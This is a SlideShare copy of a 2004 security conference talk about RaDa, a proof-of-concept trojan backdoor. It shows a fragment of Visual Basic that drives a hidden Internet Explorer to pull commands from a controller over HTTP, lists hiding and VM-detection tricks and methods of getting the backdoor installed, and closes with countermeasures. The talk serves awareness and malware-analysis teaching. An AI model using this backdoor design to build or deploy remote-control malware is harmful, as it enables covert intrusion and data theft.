SlideShare uma empresa Scribd logo

Malware RADA

Conferencias FIST
Conferencias FIST

The document describes RaDa, a new trojan backdoor that allows remote control of an infected system. RaDa uses Internet Explorer to communicate over HTTP with a controller site that issues commands. It can execute commands, download and upload files, and take screenshots without appearing in the task manager. The presentation demonstrates its capabilities and discusses improving authentication, using additional communication channels, and techniques for getting RaDa installed on target systems. Countermeasures like firewalls and behavioral analysis are recommended to detect trojans like RaDa.

Tecnologia
1 de 20
Baixar para ler offline
RaDa: a “new” trojan backdoor Jorge Ortiz & Raúl Siles jorge.ortiz@hp.com raul.siles@hp.com FIST Conference Octubre/Madrid 2004 RaDa: a “new” trojan backdoor 1
Agenda • Introduction • Healthy Environment • Remote Control (RaDa Demo) • One step beyond • Getting it in • Countermeasures RaDa: a “new” trojan backdoor 2
Intro • Awareness on trojans for remote control & protection measures. • Most concepts are based in Setiri (R.Temmingh & H.Meer. BH 2002) • Implemented by Raul Siles, David Perez & Jorge Ortiz • Honeynet Project SOTM in September (Thanks Lance and Ed!) RaDa: a “new” trojan backdoor 3
A healthy environment • You have done a pretty good job: – Policy & procedures – Firewall (ingress and egress filters) – IDS – Secure configurations – AV and Personal Firewalls • But problems appear… RaDa: a “new” trojan backdoor 4
A healthy environment Internet Router Proxy Firewall IDS Secure system RaDa: a “new” trojan backdoor 5
Remote Control • Let’s think for a minute that the intruder has been able to install a program. • We shall cover this later. RaDa: a “new” trojan backdoor 6
Remote Control: implementation • RaDa: – Very easy to do – A lot of Cut&Paste code (Google knows how to do it!) – Visual Basic, Perl… – Using the IE of the system – HTTP communications RaDa: a “new” trojan backdoor 7
RaDa: implementation Sub RaDa_Run() ' Load commands file ' Loop through the commands Set oExplorer = ' (Input fields in the first Form) CreateObject("InternetExplore For Each Element In r.Application") oExplorer.Document.Forms(0).Elements oExplorer.Visible = 0 sCommandsURL = sServerURL & Select Case Element.Name "/" & sCommandsFile Case "exe" oExplorer.Navigate sCommandsURL vRetValue = CommandExe(Element.Value) Case "get“ vRetValue = CommandGet(Element.Value) Case "put“ ' Close Internet Explorer and vRetValue = CommandPut(Element.Value) release the object variable Case Else "oExplorer" 'Ignore unknown command oExplorer.application.Quit End Select Set oExplorer = Nothing Next Element End Sub RaDa: a “new” trojan backdoor 8
RaDa: How It Works 1. Intruder publishes order 2. RaDa opens invisible IE Intruder Controller 3. IE sends GET to Ctrler 4. Ctrler sends command back to RaDa HTTP/HTTPS 5. RaDa execs command & sends response with POST 6. Intruder retrieves results from Ctrler RaDa: a “new” trojan backdoor 9
Demo RaDa: Command Exec 1. RaDa/IE retrieves command from Intruder Controller Ctrler with GET 2. Parse page <input type=“text” name=“exe” value=“…”> 3. Exec command with Cmd.exe RaDa: a “new” trojan backdoor 10
Demo RaDa: File Download 1. RaDa/IE retrieves command from Intruder Controller Ctrler with GET 2. Parse page <input type=“text” name=“get” value=“…”> 3. Download file from Ctrler with POST. 4. UUdecode and save it RaDa: a “new” trojan backdoor 11
Demo RaDa: Screen Capture 1. RaDa/IE retrieves command from Intruder Controller Ctrler with GET 2. Parse page <input type=“text” name=“screenshot” value=“…”> 3. Capture screen with selected name RaDa: a “new” trojan backdoor 12
Demo RaDa: File Upload 1. RaDa/IE retrieves command from Intruder Controller Ctrler with GET 2. Parse page <input type=“text” name=“put” value=“…”> 3. Send back contents with POST RaDa: a “new” trojan backdoor 13
Demo RaDa: hiding techniques • No application in Task Manager • Process name • Packed • HTTP through IE using HTML • Misleading info • VMWare detection RaDa: a “new” trojan backdoor 14
One Step Beyond • Strong authentication of commands (GPG) • Blog/Wiki • Multiagent management Console • Other channels (mail, dns, ping, ftp) RaDa: a “new” trojan backdoor 15
Getting it in • Zero day exploit • Ask for help: – Mail attachment – Download – Social engineering • Insider RaDa: a “new” trojan backdoor 16
Countermeasures • User awareness • Baselines (processes, memory…) • Restrict web access • Update AV signatures frequently. • Signed Executables • Behavioral vs. Signature analysis RaDa: a “new” trojan backdoor 17
Scan of the Month • Goal: – Improve the Windows reverse engineering malware state of the art • Honeynet Project: – http://www.honeynet.org/scans/ RaDa: a “new” trojan backdoor 18
That’s all folks • Thank you! • Any questions? FIST Conference Octubre/Madrid 2004 RaDa: a “new” trojan backdoor 19
Attribution-NonCommercial- NoDerivs 2.0 You are free: to copy, distribute, display, and perform the work Under the following conditions: Attribution. You must give the original author credit. Noncommercial. You may not use this work for commercial purposes. No Derivative Works. You may not alter, transform, or build upon this work. For any reuse or distribution, you must make clear to others the license terms of this work. Any of these conditions can be waived if you get permission from the author. Your fair use and other rights are in no way affected by the above. This is a human-readable summary of the http://creativecommons.org/licenses/by-nc- nd/2.0/. RaDa: a “new” trojan backdoor 20

Recomendados

Wtf is happening_inside_my_android_phone_public
Wtf is happening_inside_my_android_phone_publicWtf is happening_inside_my_android_phone_public
Wtf is happening_inside_my_android_phone_publicJaime Blasco
 
Java
JavaJava
Java박 경민
 
Everything you wanted to know about Stack Traces and Heap Dumps
Everything you wanted to know about Stack Traces and Heap DumpsEverything you wanted to know about Stack Traces and Heap Dumps
Everything you wanted to know about Stack Traces and Heap DumpsAndrei Pangin
 
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ..."Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...PROIDEA
 
"A rootkits writer’s guide to defense" - Michal Purzynski
"A rootkits writer’s guide to defense" - Michal Purzynski"A rootkits writer’s guide to defense" - Michal Purzynski
"A rootkits writer’s guide to defense" - Michal PurzynskiPROIDEA
 
Abusing Java Remote Interfaces
Abusing Java Remote InterfacesAbusing Java Remote Interfaces
Abusing Java Remote Interfacesjuanvazquezslides
 
Script Fragmentation - Stephan Chenette - OWASP/RSA 2008
Script Fragmentation - Stephan Chenette - OWASP/RSA 2008Script Fragmentation - Stephan Chenette - OWASP/RSA 2008
Script Fragmentation - Stephan Chenette - OWASP/RSA 2008Stephan Chenette
 
Joxean Koret - Database Security Paradise [Rooted CON 2011]
Joxean Koret - Database Security Paradise [Rooted CON 2011]Joxean Koret - Database Security Paradise [Rooted CON 2011]
Joxean Koret - Database Security Paradise [Rooted CON 2011]RootedCON
 

Recomendados

Wtf is happening_inside_my_android_phone_public
Wtf is happening_inside_my_android_phone_publicWtf is happening_inside_my_android_phone_public
Wtf is happening_inside_my_android_phone_publicJaime Blasco
 
Java
JavaJava
Java박 경민
 
Everything you wanted to know about Stack Traces and Heap Dumps
Everything you wanted to know about Stack Traces and Heap DumpsEverything you wanted to know about Stack Traces and Heap Dumps
Everything you wanted to know about Stack Traces and Heap DumpsAndrei Pangin
 
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ..."Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...PROIDEA
 
"A rootkits writer’s guide to defense" - Michal Purzynski
"A rootkits writer’s guide to defense" - Michal Purzynski"A rootkits writer’s guide to defense" - Michal Purzynski
"A rootkits writer’s guide to defense" - Michal PurzynskiPROIDEA
 
Abusing Java Remote Interfaces
Abusing Java Remote InterfacesAbusing Java Remote Interfaces
Abusing Java Remote Interfacesjuanvazquezslides
 
Script Fragmentation - Stephan Chenette - OWASP/RSA 2008
Script Fragmentation - Stephan Chenette - OWASP/RSA 2008Script Fragmentation - Stephan Chenette - OWASP/RSA 2008
Script Fragmentation - Stephan Chenette - OWASP/RSA 2008Stephan Chenette
 
Joxean Koret - Database Security Paradise [Rooted CON 2011]
Joxean Koret - Database Security Paradise [Rooted CON 2011]Joxean Koret - Database Security Paradise [Rooted CON 2011]
Joxean Koret - Database Security Paradise [Rooted CON 2011]RootedCON
 
Fixing the Java Serialization Mess
Fixing the Java Serialization Mess Fixing the Java Serialization Mess
Fixing the Java Serialization Mess Salesforce Engineering
 
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemyRooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemyRootedCON
 
Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...
Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...
Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...RootedCON
 
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...Christopher Frohoff
 
Defending against Java Deserialization Vulnerabilities
Defending against Java Deserialization Vulnerabilities Defending against Java Deserialization Vulnerabilities
Defending against Java Deserialization VulnerabilitiesLuca Carettoni
 
201913046 wahyu septiansyah network programing
201913046 wahyu septiansyah network programing201913046 wahyu septiansyah network programing
201913046 wahyu septiansyah network programingwahyuseptiansyah
 
Hernan Ochoa - WCE Internals [RootedCON 2011]
Hernan Ochoa - WCE Internals [RootedCON 2011]Hernan Ochoa - WCE Internals [RootedCON 2011]
Hernan Ochoa - WCE Internals [RootedCON 2011]RootedCON
 
Webinar slides: How to Secure MongoDB with ClusterControl
Webinar slides: How to Secure MongoDB with ClusterControlWebinar slides: How to Secure MongoDB with ClusterControl
Webinar slides: How to Secure MongoDB with ClusterControlSeveralnines
 
Fireshark - Brucon 2010
Fireshark - Brucon 2010Fireshark - Brucon 2010
Fireshark - Brucon 2010Stephan Chenette
 
De Java 8 a Java 17
De Java 8 a Java 17De Java 8 a Java 17
De Java 8 a Java 17Víctor Leonel Orozco López
 
Bang-Bang, you have been hacked - Yonatan Levin, KolGene
Bang-Bang, you have been hacked - Yonatan Levin, KolGeneBang-Bang, you have been hacked - Yonatan Levin, KolGene
Bang-Bang, you have been hacked - Yonatan Levin, KolGeneDroidConTLV
 
Современные технологии и инструменты анализа вредоносного ПО_PHDays_2017_Pisk...
Современные технологии и инструменты анализа вредоносного ПО_PHDays_2017_Pisk...Современные технологии и инструменты анализа вредоносного ПО_PHDays_2017_Pisk...
Современные технологии и инструменты анализа вредоносного ПО_PHDays_2017_Pisk...Ivan Piskunov
 
JavaZone 2014 - goto java;
JavaZone 2014 - goto java;JavaZone 2014 - goto java;
JavaZone 2014 - goto java;Martin (高馬丁) Skarsaune
 
Threat stack aws
Threat stack awsThreat stack aws
Threat stack awsJen Andre
 
Sysdig Open Source Intro
Sysdig Open Source IntroSysdig Open Source Intro
Sysdig Open Source IntroMichael Ducy
 
Проведение криминалистической экспертизы и анализа руткит-программ на примере...
Проведение криминалистической экспертизы и анализа руткит-программ на примере...Проведение криминалистической экспертизы и анализа руткит-программ на примере...
Проведение криминалистической экспертизы и анализа руткит-программ на примере...Alex Matrosov
 
sf bay area dfir meetup (2016-04-30) - OsxCollector
sf bay area dfir meetup (2016-04-30) - OsxCollector sf bay area dfir meetup (2016-04-30) - OsxCollector
sf bay area dfir meetup (2016-04-30) - OsxCollector Rishi Bhargava
 
Defcon CTF quals
Defcon CTF qualsDefcon CTF quals
Defcon CTF qualssnyff
 
Practical non blocking microservices in java 8
Practical non blocking microservices in java 8Practical non blocking microservices in java 8
Practical non blocking microservices in java 8Michal Balinski
 
Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Jen Andre
 
Implantación y Control de un Modelo de Gestión
Implantación y Control de un Modelo de GestiónImplantación y Control de un Modelo de Gestión
Implantación y Control de un Modelo de GestiónConferencias FIST
 
Standards
StandardsStandards
StandardsConferencias FIST
 

Mais conteúdo relacionado

Mais procurados

Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemyRooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemyRootedCON
 
Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...
Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...
Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...RootedCON
 
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...Christopher Frohoff
 
Defending against Java Deserialization Vulnerabilities
Defending against Java Deserialization Vulnerabilities Defending against Java Deserialization Vulnerabilities
Defending against Java Deserialization VulnerabilitiesLuca Carettoni
 
201913046 wahyu septiansyah network programing
201913046 wahyu septiansyah network programing201913046 wahyu septiansyah network programing
201913046 wahyu septiansyah network programingwahyuseptiansyah
 
Hernan Ochoa - WCE Internals [RootedCON 2011]
Hernan Ochoa - WCE Internals [RootedCON 2011]Hernan Ochoa - WCE Internals [RootedCON 2011]
Hernan Ochoa - WCE Internals [RootedCON 2011]RootedCON
 
Webinar slides: How to Secure MongoDB with ClusterControl
Webinar slides: How to Secure MongoDB with ClusterControlWebinar slides: How to Secure MongoDB with ClusterControl
Webinar slides: How to Secure MongoDB with ClusterControlSeveralnines
 
Bang-Bang, you have been hacked - Yonatan Levin, KolGene
Bang-Bang, you have been hacked - Yonatan Levin, KolGeneBang-Bang, you have been hacked - Yonatan Levin, KolGene
Bang-Bang, you have been hacked - Yonatan Levin, KolGeneDroidConTLV
 
Современные технологии и инструменты анализа вредоносного ПО_PHDays_2017_Pisk...
Современные технологии и инструменты анализа вредоносного ПО_PHDays_2017_Pisk...Современные технологии и инструменты анализа вредоносного ПО_PHDays_2017_Pisk...
Современные технологии и инструменты анализа вредоносного ПО_PHDays_2017_Pisk...Ivan Piskunov
 
Threat stack aws
Threat stack awsThreat stack aws
Threat stack awsJen Andre
 
Sysdig Open Source Intro
Sysdig Open Source IntroSysdig Open Source Intro
Sysdig Open Source IntroMichael Ducy
 
Проведение криминалистической экспертизы и анализа руткит-программ на примере...
Проведение криминалистической экспертизы и анализа руткит-программ на примере...Проведение криминалистической экспертизы и анализа руткит-программ на примере...
Проведение криминалистической экспертизы и анализа руткит-программ на примере...Alex Matrosov
 
sf bay area dfir meetup (2016-04-30) - OsxCollector
sf bay area dfir meetup (2016-04-30) - OsxCollector sf bay area dfir meetup (2016-04-30) - OsxCollector
sf bay area dfir meetup (2016-04-30) - OsxCollector Rishi Bhargava
 
Defcon CTF quals
Defcon CTF qualsDefcon CTF quals
Defcon CTF qualssnyff
 
Practical non blocking microservices in java 8
Practical non blocking microservices in java 8Practical non blocking microservices in java 8
Practical non blocking microservices in java 8Michal Balinski
 
Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Jen Andre
 

Mais procurados (20)

Fixing the Java Serialization Mess
Fixing the Java Serialization Mess Fixing the Java Serialization Mess
Fixing the Java Serialization Mess
 
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemyRooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy
 
Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...
Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...
Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2...
 
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...
 
Defending against Java Deserialization Vulnerabilities
Defending against Java Deserialization Vulnerabilities Defending against Java Deserialization Vulnerabilities
Defending against Java Deserialization Vulnerabilities
 
201913046 wahyu septiansyah network programing
201913046 wahyu septiansyah network programing201913046 wahyu septiansyah network programing
201913046 wahyu septiansyah network programing
 
Hernan Ochoa - WCE Internals [RootedCON 2011]
Hernan Ochoa - WCE Internals [RootedCON 2011]Hernan Ochoa - WCE Internals [RootedCON 2011]
Hernan Ochoa - WCE Internals [RootedCON 2011]
 
Webinar slides: How to Secure MongoDB with ClusterControl
Webinar slides: How to Secure MongoDB with ClusterControlWebinar slides: How to Secure MongoDB with ClusterControl
Webinar slides: How to Secure MongoDB with ClusterControl
 
Fireshark - Brucon 2010
Fireshark - Brucon 2010Fireshark - Brucon 2010
Fireshark - Brucon 2010
 
De Java 8 a Java 17
De Java 8 a Java 17De Java 8 a Java 17
De Java 8 a Java 17
 
Bang-Bang, you have been hacked - Yonatan Levin, KolGene
Bang-Bang, you have been hacked - Yonatan Levin, KolGeneBang-Bang, you have been hacked - Yonatan Levin, KolGene
Bang-Bang, you have been hacked - Yonatan Levin, KolGene
 
Современные технологии и инструменты анализа вредоносного ПО_PHDays_2017_Pisk...
Современные технологии и инструменты анализа вредоносного ПО_PHDays_2017_Pisk...Современные технологии и инструменты анализа вредоносного ПО_PHDays_2017_Pisk...
Современные технологии и инструменты анализа вредоносного ПО_PHDays_2017_Pisk...
 
JavaZone 2014 - goto java;
JavaZone 2014 - goto java;JavaZone 2014 - goto java;
JavaZone 2014 - goto java;
 
Threat stack aws
Threat stack awsThreat stack aws
Threat stack aws
 
Sysdig Open Source Intro
Sysdig Open Source IntroSysdig Open Source Intro
Sysdig Open Source Intro
 
Проведение криминалистической экспертизы и анализа руткит-программ на примере...
Проведение криминалистической экспертизы и анализа руткит-программ на примере...Проведение криминалистической экспертизы и анализа руткит-программ на примере...
Проведение криминалистической экспертизы и анализа руткит-программ на примере...
 
sf bay area dfir meetup (2016-04-30) - OsxCollector
sf bay area dfir meetup (2016-04-30) - OsxCollector sf bay area dfir meetup (2016-04-30) - OsxCollector
sf bay area dfir meetup (2016-04-30) - OsxCollector
 
Defcon CTF quals
Defcon CTF qualsDefcon CTF quals
Defcon CTF quals
 
Practical non blocking microservices in java 8
Practical non blocking microservices in java 8Practical non blocking microservices in java 8
Practical non blocking microservices in java 8
 
Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'
 

Destaque

Implantación y Control de un Modelo de Gestión
Implantación y Control de un Modelo de GestiónImplantación y Control de un Modelo de Gestión
Implantación y Control de un Modelo de GestiónConferencias FIST
 
Challenges and Benefits of Information Security Management
Challenges and Benefits of Information Security ManagementChallenges and Benefits of Information Security Management
Challenges and Benefits of Information Security ManagementConferencias FIST
 
как формировался характер юрия гагарина в семье
как формировался характер юрия гагарина в семьекак формировался характер юрия гагарина в семье
как формировался характер юрия гагарина в семьеSvetlana Chucha
 
Forensics of a Windows Systems
Forensics of a Windows SystemsForensics of a Windows Systems
Forensics of a Windows SystemsConferencias FIST
 
GoriFederica 2012-2013_es4a
GoriFederica 2012-2013_es4aGoriFederica 2012-2013_es4a
GoriFederica 2012-2013_es4aFedericafuz
 
Proteccion Contra Hacking con Google
Proteccion Contra Hacking con GoogleProteccion Contra Hacking con Google
Proteccion Contra Hacking con GoogleConferencias FIST
 
Events Logging Markup Language
Events Logging Markup LanguageEvents Logging Markup Language
Events Logging Markup LanguageConferencias FIST
 
Ataque a un sistema en entorno wireless fist
Ataque a un sistema en entorno wireless fistAtaque a un sistema en entorno wireless fist
Ataque a un sistema en entorno wireless fistConferencias FIST
 
Type of speeches
Type of speechesType of speeches
Type of speechescarlostunon
 

Destaque (19)

Implantación y Control de un Modelo de Gestión
Implantación y Control de un Modelo de GestiónImplantación y Control de un Modelo de Gestión
Implantación y Control de un Modelo de Gestión
 
Standards
StandardsStandards
Standards
 
Challenges and Benefits of Information Security Management
Challenges and Benefits of Information Security ManagementChallenges and Benefits of Information Security Management
Challenges and Benefits of Information Security Management
 
Cisco Equipment Security
Cisco Equipment SecurityCisco Equipment Security
Cisco Equipment Security
 
La jungla de las redes Wifi
La jungla de las redes WifiLa jungla de las redes Wifi
La jungla de las redes Wifi
 
как формировался характер юрия гагарина в семье
как формировался характер юрия гагарина в семьекак формировался характер юрия гагарина в семье
как формировался характер юрия гагарина в семье
 
Forensics of a Windows Systems
Forensics of a Windows SystemsForensics of a Windows Systems
Forensics of a Windows Systems
 
GoriFederica 2012-2013_es4a
GoriFederica 2012-2013_es4aGoriFederica 2012-2013_es4a
GoriFederica 2012-2013_es4a
 
Security Metrics
Security MetricsSecurity Metrics
Security Metrics
 
Spanish Honeynet Project
Spanish Honeynet ProjectSpanish Honeynet Project
Spanish Honeynet Project
 
Proteccion Contra Hacking con Google
Proteccion Contra Hacking con GoogleProteccion Contra Hacking con Google
Proteccion Contra Hacking con Google
 
Events Logging Markup Language
Events Logging Markup LanguageEvents Logging Markup Language
Events Logging Markup Language
 
Google as a Hacking Tool
Google as a Hacking ToolGoogle as a Hacking Tool
Google as a Hacking Tool
 
Ataque a un sistema en entorno wireless fist
Ataque a un sistema en entorno wireless fistAtaque a un sistema en entorno wireless fist
Ataque a un sistema en entorno wireless fist
 
WAFEC
WAFECWAFEC
WAFEC
 
Access Control Management
Access Control ManagementAccess Control Management
Access Control Management
 
CERT Certification
CERT CertificationCERT Certification
CERT Certification
 
Network Forensics
Network ForensicsNetwork Forensics
Network Forensics
 
Type of speeches
Type of speechesType of speeches
Type of speeches
 

Semelhante a Malware RADA

Using Algorithms to Brute Force Algorithms...A Journey Through Time and Names...
Using Algorithms to Brute Force Algorithms...A Journey Through Time and Names...Using Algorithms to Brute Force Algorithms...A Journey Through Time and Names...
Using Algorithms to Brute Force Algorithms...A Journey Through Time and Names...OpenDNS
 
Puppetconf2016 Puppet on Windows
Puppetconf2016 Puppet on WindowsPuppetconf2016 Puppet on Windows
Puppetconf2016 Puppet on WindowsNicolas Corrarello
 
PuppetConf 2016: Puppet on Windows – Nicolas Corrarello, Puppet
PuppetConf 2016: Puppet on Windows – Nicolas Corrarello, PuppetPuppetConf 2016: Puppet on Windows – Nicolas Corrarello, Puppet
PuppetConf 2016: Puppet on Windows – Nicolas Corrarello, PuppetPuppet
 
Learn enough Docker to be dangerous
Learn enough Docker to be dangerousLearn enough Docker to be dangerous
Learn enough Docker to be dangerousDavid Tan
 
New Docker Features for Orchestration and Containers
New Docker Features for Orchestration and ContainersNew Docker Features for Orchestration and Containers
New Docker Features for Orchestration and ContainersJeff Anderson
 
What's New in Docker 1.12 by Mike Goelzer and Andrea Luzzardi
What's New in Docker 1.12 by Mike Goelzer and Andrea LuzzardiWhat's New in Docker 1.12 by Mike Goelzer and Andrea Luzzardi
What's New in Docker 1.12 by Mike Goelzer and Andrea LuzzardiDocker, Inc.
 
What's New in Docker 1.12 (June 20, 2016) by Mike Goelzer & Andrea Luzzardi
What's New in Docker 1.12 (June 20, 2016) by Mike Goelzer & Andrea LuzzardiWhat's New in Docker 1.12 (June 20, 2016) by Mike Goelzer & Andrea Luzzardi
What's New in Docker 1.12 (June 20, 2016) by Mike Goelzer & Andrea LuzzardiMike Goelzer
 
Setiri : Advances in trojan technology
Setiri : Advances in trojan technologySetiri : Advances in trojan technology
Setiri : Advances in trojan technologySensePost
 
Picking gem ruby for penetration testers
Picking gem ruby for penetration testersPicking gem ruby for penetration testers
Picking gem ruby for penetration testersPaolo Perego
 
Orchestrating Docker with OpenStack
Orchestrating Docker with OpenStackOrchestrating Docker with OpenStack
Orchestrating Docker with OpenStackErica Windisch
 
idsecconf2023 - Satria Ady Pradana - Launch into the Stratus-phere Adversary ...
idsecconf2023 - Satria Ady Pradana - Launch into the Stratus-phere Adversary ...idsecconf2023 - Satria Ady Pradana - Launch into the Stratus-phere Adversary ...
idsecconf2023 - Satria Ady Pradana - Launch into the Stratus-phere Adversary ...idsecconf
 
DBI-Assisted Android Application Reverse Engineering
DBI-Assisted Android Application Reverse EngineeringDBI-Assisted Android Application Reverse Engineering
DBI-Assisted Android Application Reverse EngineeringSahil Dhar
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsShakacon
 
Docker security
Docker securityDocker security
Docker securityJanos Suto
 
Solaris DTrace, An Introduction
Solaris DTrace, An IntroductionSolaris DTrace, An Introduction
Solaris DTrace, An Introductionsatyajit_t
 
Create a Database Application Development Environment with Docker
Create a Database Application Development Environment with DockerCreate a Database Application Development Environment with Docker
Create a Database Application Development Environment with DockerBlaine Carter
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliPriyanka Aash
 
Docker Essentials Workshop— Innovation Labs July 2020
Docker Essentials Workshop— Innovation Labs July 2020Docker Essentials Workshop— Innovation Labs July 2020
Docker Essentials Workshop— Innovation Labs July 2020CloudHero
 

Semelhante a Malware RADA (20)

Using Algorithms to Brute Force Algorithms...A Journey Through Time and Names...
Using Algorithms to Brute Force Algorithms...A Journey Through Time and Names...Using Algorithms to Brute Force Algorithms...A Journey Through Time and Names...
Using Algorithms to Brute Force Algorithms...A Journey Through Time and Names...
 
Puppetconf2016 Puppet on Windows
Puppetconf2016 Puppet on WindowsPuppetconf2016 Puppet on Windows
Puppetconf2016 Puppet on Windows
 
PuppetConf 2016: Puppet on Windows – Nicolas Corrarello, Puppet
PuppetConf 2016: Puppet on Windows – Nicolas Corrarello, PuppetPuppetConf 2016: Puppet on Windows – Nicolas Corrarello, Puppet
PuppetConf 2016: Puppet on Windows – Nicolas Corrarello, Puppet
 
Learn enough Docker to be dangerous
Learn enough Docker to be dangerousLearn enough Docker to be dangerous
Learn enough Docker to be dangerous
 
New Docker Features for Orchestration and Containers
New Docker Features for Orchestration and ContainersNew Docker Features for Orchestration and Containers
New Docker Features for Orchestration and Containers
 
What's New in Docker 1.12 by Mike Goelzer and Andrea Luzzardi
What's New in Docker 1.12 by Mike Goelzer and Andrea LuzzardiWhat's New in Docker 1.12 by Mike Goelzer and Andrea Luzzardi
What's New in Docker 1.12 by Mike Goelzer and Andrea Luzzardi
 
What's New in Docker 1.12 (June 20, 2016) by Mike Goelzer & Andrea Luzzardi
What's New in Docker 1.12 (June 20, 2016) by Mike Goelzer & Andrea LuzzardiWhat's New in Docker 1.12 (June 20, 2016) by Mike Goelzer & Andrea Luzzardi
What's New in Docker 1.12 (June 20, 2016) by Mike Goelzer & Andrea Luzzardi
 
Setiri : Advances in trojan technology
Setiri : Advances in trojan technologySetiri : Advances in trojan technology
Setiri : Advances in trojan technology
 
A22 Introduction to DTrace by Kyle Hailey
A22 Introduction to DTrace by Kyle HaileyA22 Introduction to DTrace by Kyle Hailey
A22 Introduction to DTrace by Kyle Hailey
 
Picking gem ruby for penetration testers
Picking gem ruby for penetration testersPicking gem ruby for penetration testers
Picking gem ruby for penetration testers
 
Dns rebinding
Dns rebindingDns rebinding
Dns rebinding
 
Orchestrating Docker with OpenStack
Orchestrating Docker with OpenStackOrchestrating Docker with OpenStack
Orchestrating Docker with OpenStack
 
idsecconf2023 - Satria Ady Pradana - Launch into the Stratus-phere Adversary ...
idsecconf2023 - Satria Ady Pradana - Launch into the Stratus-phere Adversary ...idsecconf2023 - Satria Ady Pradana - Launch into the Stratus-phere Adversary ...
idsecconf2023 - Satria Ady Pradana - Launch into the Stratus-phere Adversary ...
 
DBI-Assisted Android Application Reverse Engineering
DBI-Assisted Android Application Reverse EngineeringDBI-Assisted Android Application Reverse Engineering
DBI-Assisted Android Application Reverse Engineering
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
 
Docker security
Docker securityDocker security
Docker security
 
Solaris DTrace, An Introduction
Solaris DTrace, An IntroductionSolaris DTrace, An Introduction
Solaris DTrace, An Introduction
 
Create a Database Application Development Environment with Docker
Create a Database Application Development Environment with DockerCreate a Database Application Development Environment with Docker
Create a Database Application Development Environment with Docker
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
 
Docker Essentials Workshop— Innovation Labs July 2020
Docker Essentials Workshop— Innovation Labs July 2020Docker Essentials Workshop— Innovation Labs July 2020
Docker Essentials Workshop— Innovation Labs July 2020
 

Mais de Conferencias FIST

Seguridad en Entornos Web Open Source
Seguridad en Entornos Web Open SourceSeguridad en Entornos Web Open Source
Seguridad en Entornos Web Open SourceConferencias FIST
 
Las Evidencias Digitales en la Informática Forense
Las Evidencias Digitales en la Informática ForenseLas Evidencias Digitales en la Informática Forense
Las Evidencias Digitales en la Informática ForenseConferencias FIST
 
Evolución y situación actual de la seguridad en redes WiFi
